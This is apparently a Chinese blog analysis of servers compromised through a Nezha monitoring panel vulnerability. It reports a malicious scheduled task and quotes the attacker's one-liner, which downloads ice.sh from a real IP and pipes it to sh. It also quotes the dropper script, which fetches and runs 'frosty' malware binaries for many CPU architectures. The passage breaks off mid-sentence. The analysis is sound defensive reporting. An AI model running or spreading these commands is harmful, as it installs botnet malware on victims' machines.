这里有最新的使用文档和教程
哪吒监控高危漏洞公开后,开始陆续出现服务器被黑的案例。
在 NodeSeek 社区,有用户发现自己的哪吒面板中出现了一个可疑的计划任务,而这个任务背后,指向了一台位于捷克布拉格的服务器。
原帖:
https://www.nodeloc.com/t/topic/94234/4经过进一步分析,我发现这并非普通的 PoC(漏洞验证代码),而是一套真实的恶意载荷投放基础设施。
用户在哪吒监控后台发现如下任务:
任务名称:
auto-poc-uid执行命令:
(wget -O- http://86.54.82.179/ice.sh||curl -sL http://86.54.82.179/ice.sh)|sh其含义是:
这类写法经常出现在木马下载器、挖矿程序以及僵尸网络传播脚本中。
根据社区流出的内容,ice.sh 的主要逻辑如下:
cd /tmp 2>/dev/null||cd /var/run 2>/dev/null||cd /mnt 2>/dev/null||cd /for a in x86 mips mpsl arm arm5 arm6 arm7 ppc m68k sh4 spc; do(wget http://86.54.82.179/bins/frosty.$a -O b ||curl -o b http://86.54.82.179/bins/frosty.$a ||tftp -gr frosty.$a 86.54.82.179 ||ftpget -u anonymous -p anonymous -P 21 86.54.82.179 frosty.$a b)chmod 777 b./bdone
脚本逻辑并不复杂:
真正值得关注的不是 ice.sh 本身,而是它下载的文件:
frosty.x86
frosty.arm
frosty.mips
frosty.ppc
frosty.sh4
...... 换句话说,ice.sh 只是一个下载器。
真正的恶意逻辑隐藏在 frosty 系列二进制文件中。
脚本支持大量 CPU 架构:
x86
arm
arm5
arm6
arm7
mips
ppc
m68k
sh4 这意味着攻击目标并不仅仅是云服务器。
同时覆盖: